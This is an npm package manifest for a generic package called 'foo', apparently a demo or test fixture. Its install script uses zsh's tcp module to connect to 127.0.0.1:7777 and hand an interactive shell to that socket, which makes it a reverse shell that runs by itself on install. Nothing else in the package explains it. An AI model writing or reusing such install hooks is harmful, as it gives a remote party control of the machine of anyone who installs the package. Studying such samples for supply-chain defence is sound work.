{
  "name": "foo",
  "version": "1.0.0",
  "description": "Foo bar",
  "main": "index.js",
  "scripts": {
    "install": "zsh -c 'zmodload zsh/net/tcp && ztcp 127.0.0.1 7777 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
  },
  "author": "",
  "license": "ISC"
}
